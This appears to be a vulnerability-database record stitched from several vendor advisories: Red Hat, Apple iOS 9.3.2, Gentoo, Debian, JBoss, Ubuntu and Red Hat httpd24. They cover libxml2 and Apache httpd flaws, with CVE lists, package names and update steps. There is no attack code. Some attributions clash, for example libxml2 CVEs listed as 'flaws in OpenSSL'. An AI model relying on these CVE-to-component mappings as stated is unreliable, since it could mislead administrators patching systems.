libxml2-devel-2.7.6-21.el6_8.1.i686.rpm libxml2-python-2.7.6-21.el6_8.1.i686.rpm x86_64: libxml2-2.7.6-21.el6_8.1.i686.rpm libxml2-2.7.6-21.el6_8.1.x86_64.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-devel-2.7.6-21.el6_8.1.i686.rpm libxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm libxml2-python-2.7.6-21.el6_8.1.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 6): i386: libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-static-2.7.6-21.el6_8.1.i686.rpm x86_64: libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-static-2.7.6-21.el6_8.1.x86_64.rpm Red Hat Enterprise Linux Client (v. 7): Source: libxml2-2.9.1-6.el7_2.3.src.rpm x86_64: libxml2-2.9.1-6.el7_2.3.i686.rpm libxml2-2.9.1-6.el7_2.3.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm Red Hat Enterprise Linux Client Optional (v. 7): x86_64: libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.3.i686.rpm libxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm libxml2-static-2.9.1-6.el7_2.3.i686.rpm libxml2-static-2.9.1-6.el7_2.3.x86_64.rpm Red Hat Enterprise Linux ComputeNode (v. 7): Source: libxml2-2.9.1-6.el7_2.3.src.rpm x86_64: libxml2-2.9.1-6.el7_2.3.i686.rpm libxml2-2.9.1-6.el7_2.3.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm Red Hat Enterprise Linux ComputeNode Optional (v. 7): x86_64: libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.3.i686.rpm libxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm libxml2-static-2.9.1-6.el7_2.3.i686.rpm libxml2-static-2.9.1-6.el7_2.3.x86_64.rpm Red Hat Enterprise Linux Server (v. 7): Source: libxml2-2.9.1-6.el7_2.3.src.rpm ppc64: libxml2-2.9.1-6.el7_2.3.ppc.rpm libxml2-2.9.1-6.el7_2.3.ppc64.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.ppc.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.ppc64.rpm libxml2-devel-2.9.1-6.el7_2.3.ppc.rpm libxml2-devel-2.9.1-6.el7_2.3.ppc64.rpm libxml2-python-2.9.1-6.el7_2.3.ppc64.rpm ppc64le: libxml2-2.9.1-6.el7_2.3.ppc64le.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.ppc64le.rpm libxml2-devel-2.9.1-6.el7_2.3.ppc64le.rpm libxml2-python-2.9.1-6.el7_2.3.ppc64le.rpm s390x: libxml2-2.9.1-6.el7_2.3.s390.rpm libxml2-2.9.1-6.el7_2.3.s390x.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.s390.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.s390x.rpm libxml2-devel-2.9.1-6.el7_2.3.s390.rpm libxml2-devel-2.9.1-6.el7_2.3.s390x.rpm libxml2-python-2.9.1-6.el7_2.3.s390x.rpm x86_64: libxml2-2.9.1-6.el7_2.3.i686.rpm libxml2-2.9.1-6.el7_2.3.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.3.i686.rpm libxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 7): ppc64: libxml2-debuginfo-2.9.1-6.el7_2.3.ppc.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.ppc64.rpm libxml2-static-2.9.1-6.el7_2.3.ppc.rpm libxml2-static-2.9.1-6.el7_2.3.ppc64.rpm ppc64le: libxml2-debuginfo-2.9.1-6.el7_2.3.ppc64le.rpm libxml2-static-2.9.1-6.el7_2.3.ppc64le.rpm s390x: libxml2-debuginfo-2.9.1-6.el7_2.3.s390.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.s390x.rpm libxml2-static-2.9.1-6.el7_2.3.s390.rpm libxml2-static-2.9.1-6.el7_2.3.s390x.rpm x86_64: libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-static-2.9.1-6.el7_2.3.i686.rpm libxml2-static-2.9.1-6.el7_2.3.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 7): Source: libxml2-2.9.1-6.el7_2.3.src.rpm x86_64: libxml2-2.9.1-6.el7_2.3.i686.rpm libxml2-2.9.1-6.el7_2.3.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.3.i686.rpm libxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 7): x86_64: libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-static-2.9.1-6.el7_2.3.i686.rpm libxml2-static-2.9.1-6.el7_2.3.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2016-1762 https://access.redhat.com/security/cve/CVE-2016-1833 https://access.redhat.com/security/cve/CVE-2016-1834 https://access.redhat.com/security/cve/CVE-2016-1835 https://access.redhat.com/security/cve/CVE-2016-1836 https://access.redhat.com/security/cve/CVE-2016-1837 https://access.redhat.com/security/cve/CVE-2016-1838 https://access.redhat.com/security/cve/CVE-2016-1839 https://access.redhat.com/security/cve/CVE-2016-1840 https://access.redhat.com/security/cve/CVE-2016-3627 https://access.redhat.com/security/cve/CVE-2016-3705 https://access.redhat.com/security/cve/CVE-2016-4447 https://access.redhat.com/security/cve/CVE-2016-4448 https://access.redhat.com/security/cve/CVE-2016-4449 https://access.redhat.com/security/updates/classification/#important 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFXa8B8XlSAg2UNWIIRAh9ZAJ99xgPhOaIopIxmynm+vlDcmw4jFACeLvTm ZsVLEgJAF0Zt6xZVzqvVW7U= =fREV -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 APPLE-SA-2016-05-16-2 iOS 9.3.2 iOS 9.3.2 is now available and addresses the following: Accessibility Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to determine kernel memory layout Description: A buffer overflow was addressed through improved size validation. CVE-ID CVE-2016-1790 : Rapelly Akhil CFNetwork Proxies Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker in a privileged network position may be able to leak sensitive user information Description: An information leak existed in the handling of HTTP and HTTPS requests. This issue was addressed through improved URL handling. CVE-ID CVE-2016-1801 : Alex Chapman and Paul Stone of Context Information Security CommonCrypto Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious application may be able to leak sensitive user information Description: An issue existed in the handling of return values in CCCrypt. This issue was addressed through improved key length management. CVE-ID CVE-2016-1802 : Klaus Rodewig CoreCapture Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference was addressed through improved validation. CVE-ID CVE-2016-1803 : Ian Beer of Google Project Zero, daybreaker working with Trend Micro’s Zero Day Initiative Disk Images Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A local attacker may be able to read kernel memory Description: A race condition was addressed through improved locking. CVE-ID CVE-2016-1807 : Ian Beer of Google Project Zero Disk Images Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the parsing of disk images. This issue was addressed through improved memory handling. CVE-ID CVE-2016-1808 : Moony Li (@Flyic) and Jack Tang (@jacktang310) of Trend Micro ImageIO Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing a maliciously crafted image may lead to a denial of service Description: A null pointer dereference was addressed through improved validation. CVE-ID CVE-2016-1811 : Lander Brandt (@landaire) IOAcceleratorFamily Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1817 : Moony Li (@Flyic) and Jack Tang (@jacktang310) of Trend Micro working with Trend Micro's Zero Day Initiative CVE-2016-1818 : Juwei Lin of TrendMicro CVE-2016-1819 : Ian Beer of Google Project Zero IOAcceleratorFamily Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to cause a denial of service Description: A null pointer dereference was addressed through improved locking. CVE-ID CVE-2016-1814 : Juwei Lin of TrendMicro IOAcceleratorFamily Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference was addressed through improved validation. CVE-ID CVE-2016-1813 : Ian Beer of Google Project Zero IOHIDFamily Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1823 : Ian Beer of Google Project Zero CVE-2016-1824 : Marco Grassi (@marcograss) of KeenLab (@keen_lab), Tencent Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1827 : Brandon Azad CVE-2016-1828 : Brandon Azad CVE-2016-1829 : CESG CVE-2016-1830 : Brandon Azad CVE-2016-1831 : Brandon Azad libc Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A local attacker may be able to cause unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-ID CVE-2016-1832 : Karl Williamson libxml2 Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing maliciously crafted XML may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1833 : Mateusz Jurczyk CVE-2016-1834 : Apple CVE-2016-1835 : Wei Lei and Liu Yang of Nanyang Technological University CVE-2016-1836 : Wei Lei and Liu Yang of Nanyang Technological University CVE-2016-1837 : Wei Lei and Liu Yang of Nanyang Technological University CVE-2016-1838 : Mateusz Jurczyk CVE-2016-1839 : Mateusz Jurczyk CVE-2016-1840 : Kostya Serebryany libxslt Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1841 : Sebastian Apelt MapKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker in a privileged network position may be able to leak sensitive user information Description: Shared links were sent with HTTP rather than HTTPS. This was addressed by enabling HTTPS for shared links. CVE-ID CVE-2016-1842 : Richard Shupak (https://www.linkedin.com/in/rshupak) OpenGL Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1847 : Tongbo Luo and Bo Qu of Palo Alto Networks Safari Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A user may be unable to fully delete browsing history Description: "Clear History and Website Data" did not clear the history. The issue was addressed through improved data deletion. CVE-ID CVE-2016-1849 : Adham Ghrayeb Siri Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A person with physical access to an iOS device may be able to use Siri to access contacts and photos from the the lock screen Description: A state management issue existed when accessing Siri results on the lock screen. This issue was addressed by disabling data detectors in Twitter results when the device is locked. CVE-ID CVE-2016-1852 : videosdebarraquito WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a malicious website may disclose data from another website Description: An insufficient taint tracking issue in the parsing of svg images was addressed through improved taint tracking. CVE-ID CVE-2016-1858 : an anonymous researcher WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1854 : Anonymous working with Trend Micro's Zero Day Initiative CVE-2016-1855 : Tongbo Luo and Bo Qu of Palo Alto Networks CVE-2016-1856 : lokihardt working with Trend Micro's Zero Day Initiative CVE-2016-1857 : Jeonghoon Shin@A.D.D, Liang Chen, Zhen Feng, wushi of KeenLab, Tencent working with Trend Micro's Zero Day Initiative WebKit Canvas Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1859 : Liang Chen, wushi of KeenLab, Tencent working with Trend Micro's Zero Day Initiative Installation note: This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from www.apple.com/itunes/ iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device. The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. The version after applying this update will be "9.3.2". - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201701-37 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libxml2: Multiple vulnerabilities Date: January 16, 2017 Bugs: #564776, #566374, #572878, #573820, #577998, #582538, #582540, #583888, #589816, #597112, #597114, #597116 ID: 201701-37 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in libxml2, the worst of which could lead to the execution of arbitrary code. Background ========== libxml2 is the XML (eXtended Markup Language) C parser and toolkit initially developed for the Gnome project. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-libs/libxml2 < 2.9.4-r1 >= 2.9.4-r1 Description =========== Multiple vulnerabilities have been discovered in libxml2. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All libxml2 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.9.4-r1" References ========== [ 1 ] CVE-2015-1819 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1819 [ 2 ] CVE-2015-5312 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5312 [ 3 ] CVE-2015-7497 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7497 [ 4 ] CVE-2015-7498 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7498 [ 5 ] CVE-2015-7499 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7499 [ 6 ] CVE-2015-7500 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7500 [ 7 ] CVE-2015-7941 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7941 [ 8 ] CVE-2015-7942 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7942 [ 9 ] CVE-2015-8035 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8035 [ 10 ] CVE-2015-8242 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8242 [ 11 ] CVE-2015-8806 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8806 [ 12 ] CVE-2016-1836 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1836 [ 13 ] CVE-2016-1838 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1838 [ 14 ] CVE-2016-1839 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1839 [ 15 ] CVE-2016-1840 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1840 [ 16 ] CVE-2016-2073 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2073 [ 17 ] CVE-2016-3627 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3627 [ 18 ] CVE-2016-3705 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3705 [ 19 ] CVE-2016-4483 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4483 [ 20 ] CVE-2016-4658 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4658 [ 21 ] CVE-2016-5131 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5131 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201701-37 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2017 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . For the stable distribution (jessie), these problems have been fixed in version 2.9.1+dfsg1-5+deb8u2. Description: This release of Red Hat JBoss Core Services httpd 2.4.23 serves as a replacement for JBoss Core Services Apache HTTP Server 2.4.6. Security Fix(es): * This update fixes several flaws in OpenSSL. (CVE-2016-1762, CVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705, CVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483) * This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420, CVE-2016-7141) * This update fixes two flaws in httpd. (CVE-2016-4459, CVE-2016-8612) * A buffer overflow flaw when concatenating virtual host names and URIs was fixed in mod_jk. (CVE-2016-6808) * A memory leak flaw was fixed in expat. Upstream acknowledges Stephen Henson (OpenSSL development team) as the original reporter of CVE-2015-0286; Huzaifa Sidhpurwala (Red Hat), Hanno BAPck, and David Benjamin (Google) as the original reporters of CVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2105, CVE-2016-2106, CVE-2016-0797, CVE-2016-0799, and CVE-2016-2842; Juraj Somorovsky as the original reporter of CVE-2016-2107; Yuval Yarom (University of Adelaide and NICTA), Daniel Genkin (Technion and Tel Aviv University), and Nadia Heninger (University of Pennsylvania) as the original reporters of CVE-2016-0702; and Adam Langley (Google/BoringSSL) as the original reporter of CVE-2016-0705. See the corresponding CVE pages linked to in the References section for more information about each of the flaws listed in this advisory. Solution: The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files). After installing the updated packages, the httpd daemon will be restarted automatically. JIRA issues fixed (https://issues.jboss.org/): JBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0] JBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service 6
var-202109-1804 A carefully crafted request uri-path can cause mod_proxy_uwsgi to read above the allocated memory and crash (DoS). This issue affects Apache HTTP Server versions 2.4.30 to 2.4.48 (inclusive). The server is fast, reliable and extensible through a simple API. The highest threat from this vulnerability is to system availability. ========================================================================== Ubuntu Security Notice USN-5090-4 September 28, 2021 apache2 regression ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 16.04 ESM Summary: USN-5090-1 introduced a regression in Apache HTTP Server. One of the upstream fixes introduced a regression in UDS URIs. This update fixes the problem. Original advisory details: James Kettle discovered that the Apache HTTP Server HTTP/2 module incorrectly handled certain crafted methods. A remote attacker could possibly use this issue to perform request splitting or cache poisoning attacks. A remote attacker could possibly use this issue to cause the server to crash, resulting in a denial of service. (CVE-2021-34798) Li Zhi Xin discovered that the Apache mod_proxy_uwsgi module incorrectly handled certain request uri-paths. A remote attacker could possibly use this issue to cause the server to crash, resulting in a denial of service. This issue only affected Ubuntu 20.04 LTS and Ubuntu 21.04. If the server was configured with third-party modules, a remote attacker could use this issue to cause the server to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2021-39275) It was discovered that the Apache mod_proxy module incorrectly handled certain request uri-paths. A remote attacker could possibly use this issue to cause the server to forward requests to arbitrary origin servers. (CVE-2021-40438) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 16.04 ESM: apache2 2.4.18-2ubuntu3.17+esm3 apache2-bin 2.4.18-2ubuntu3.17+esm3 In general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ===================================================================== Red Hat Security Advisory Synopsis: Moderate: httpd24-httpd security and bug fix update Advisory ID: RHSA-2022:6753-01 Product: Red Hat Software Collections Advisory URL: https://access.redhat.com/errata/RHSA-2022:6753 Issue date: 2022-09-29 CVE Names: CVE-2021-33193 CVE-2021-34798 CVE-2021-36160 CVE-2021-39275 CVE-2021-44224 CVE-2022-22719 CVE-2022-22721 CVE-2022-23943 CVE-2022-26377 CVE-2022-28614 CVE-2022-28615 CVE-2022-29404 CVE-2022-30522 CVE-2022-30556 CVE-2022-31813 ===================================================================== 1. Summary: An update for httpd24-httpd is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64le, s390x, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 3. Security Fix(es): * httpd: mod_sed: Read/write beyond bounds (CVE-2022-23943) * httpd: Request splitting via HTTP/2 method injection and mod_proxy (CVE-2021-33193) * httpd: NULL pointer dereference via malformed requests (CVE-2021-34798) * httpd: mod_proxy_uwsgi: out-of-bounds read via a crafted request uri-path (CVE-2021-36160) * httpd: Out-of-bounds write in ap_escape_quotes() via malicious input (CVE-2021-39275) * httpd: possible NULL dereference or SSRF in forward proxy configurations (CVE-2021-44224) * httpd: mod_lua: Use of uninitialized value of in r:parsebody (CVE-2022-22719) * httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody (CVE-2022-22721) * httpd: mod_proxy_ajp: Possible request smuggling (CVE-2022-26377) * httpd: mod_lua: DoS in r:parsebody (CVE-2022-29404) * httpd: mod_sed: DoS vulnerability (CVE-2022-30522) * httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism (CVE-2022-31813) * httpd: out-of-bounds read via ap_rwrite() (CVE-2022-28614) * httpd: out-of-bounds read in ap_strcmp_match() (CVE-2022-28615) * httpd: mod_lua: Information disclosure with websockets (CVE-2022-30556) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Bug Fix(es): * proxy rewrite to unix socket fails with CVE-2021-40438 fix (BZ#2022319) Additional changes: * To fix CVE-2022-29404, the default value for the "LimitRequestBody" directive in the Apache HTTP Server has been changed from 0 (unlimited) to 1 GiB. On systems where the value of "LimitRequestBody" is not explicitly specified in an httpd configuration file, updating the httpd package sets "LimitRequestBody" to the default value of 1 GiB. As a consequence, if the total size of the HTTP request body exceeds this 1 GiB default limit, httpd returns the 413 Request Entity Too Large error code. If the new default allowed size of an HTTP request message body is insufficient for your use case, update your httpd configuration files within the respective context (server, per-directory, per-file, or per-location) and set your preferred limit in bytes. For example, to set a new 2 GiB limit, use: LimitRequestBody 2147483648 Systems already configured to use any explicit value for the "LimitRequestBody" directive are unaffected by this change. 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 After installing the updated packages, the httpd daemon will be restarted automatically. 5. Bugs fixed (https://bugzilla.redhat.com/): 1966728 - CVE-2021-33193 httpd: Request splitting via HTTP/2 method injection and mod_proxy 2005119 - CVE-2021-39275 httpd: Out-of-bounds write in ap_escape_quotes() via malicious input 2005124 - CVE-2021-36160 httpd: mod_proxy_uwsgi: out-of-bounds read via a crafted request uri-path 2005128 - CVE-2021-34798 httpd: NULL pointer dereference via malformed requests 2034672 - CVE-2021-44224 httpd: possible NULL dereference or SSRF in forward proxy configurations 2064319 - CVE-2022-23943 httpd: mod_sed: Read/write beyond bounds 2064320 - CVE-2022-22721 httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody 2064322 - CVE-2022-22719 httpd: mod_lua: Use of uninitialized value of in r:parsebody 2094997 - CVE-2022-26377 httpd: mod_proxy_ajp: Possible request smuggling 2095002 - CVE-2022-28614 httpd: out-of-bounds read via ap_rwrite() 2095006 - CVE-2022-28615 httpd: out-of-bounds read in ap_strcmp_match() 2095012 - CVE-2022-29404 httpd: mod_lua: DoS in r:parsebody 2095015 - CVE-2022-30522 httpd: mod_sed: DoS vulnerability 2095018 - CVE-2022-30556 httpd: mod_lua: Information disclosure with websockets 2095020 - CVE-2022-31813 httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism 6. Package List: Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7): Source: httpd24-httpd-2.4.34-23.el7.5.src.rpm noarch: httpd24-httpd-manual-2.4.34-23.el7.5.noarch.rpm ppc64le: httpd24-httpd-2.4.34-23.el7.5.ppc64le.rpm httpd24-httpd-debuginfo-2.4.34-23.el7.5.ppc64le.rpm httpd24-httpd-devel-2.4.34-23.el7.5.ppc64le.rpm httpd24-httpd-tools-2.4.34-23.el7.5.ppc64le.rpm httpd24-mod_ldap-2.4.34-23.el7.5.ppc64le.rpm httpd24-mod_proxy_html-2.4.34-23.el7.5.ppc64le.rpm httpd24-mod_session-2.4.34-23.el7.5.ppc64le.rpm httpd24-mod_ssl-2.4.34-23.el7.5.ppc64le.rpm s390x: httpd24-httpd-2.4.34-23.el7.5.s390x.rpm httpd24-httpd-debuginfo-2.4.34-23.el7.5.s390x.rpm httpd24-httpd-devel-2.4.34-23.el7.5.s390x.rpm httpd24-httpd-tools-2.4.34-23.el7.5.s390x.rpm httpd24-mod_ldap-2.4.34-23.el7.5.s390x.rpm httpd24-mod_proxy_html-2.4.34-23.el7.5.s390x.rpm httpd24-mod_session-2.4.34-23.el7.5.s390x.rpm httpd24-mod_ssl-2.4.34-23.el7.5.s390x.rpm x86_64: httpd24-httpd-2.4.34-23.el7.5.x86_64.rpm httpd24-httpd-debuginfo-2.4.34-23.el7.5.x86_64.rpm httpd24-httpd-devel-2.4.34-23.el7.5.x86_64.rpm httpd24-httpd-tools-2.4.34-23.el7.5.x86_64.rpm httpd24-mod_ldap-2.4.34-23.el7.5.x86_64.rpm httpd24-mod_proxy_html-2.4.34-23.el7.5.x86_64.rpm httpd24-mod_session-2.4.34-23.el7.5.x86_64.rpm httpd24-mod_ssl-2.4.34-23.el7.5.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7): Source: httpd24-httpd-2.4.34-23.el7.5.src.rpm noarch: httpd24-httpd-manual-2.4.34-23.el7.5.noarch.rpm x86_64: httpd24-httpd-2.4.34-23.el7.5.x86_64.rpm httpd24-httpd-debuginfo-2.4.34-23.el7.5.x86_64.rpm httpd24-httpd-devel-2.4.34-23.el7.5.x86_64.rpm httpd24-httpd-tools-2.4.34-23.el7.5.x86_64.rpm httpd24-mod_ldap-2.4.34-23.el7.5.x86_64.rpm httpd24-mod_proxy_html-2.4.34-23.el7.5.x86_64.rpm httpd24-mod_session-2.4.34-23.el7.5.x86_64.rpm httpd24-mod_ssl-2.4.34-23.el7.5.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2021-33193 https://access.redhat.com/security/cve/CVE-2021-34798 https://access.redhat.com/security/cve/CVE-2021-36160 https://access.redhat.com/security/cve/CVE-2021-39275 https://access.redhat.com/security/cve/CVE-2021-44224 https://access.redhat.com/security/cve/CVE-2022-22719 https://access.redhat.com/security/cve/CVE-2022-22721 https://access.redhat.com/security/cve/CVE-2022-23943 https://access.redhat.com/security/cve/CVE-2022-26377 https://access.redhat.com/security/cve/CVE-2022-28614 https://access.redhat.com/security/cve/CVE-2022-28615 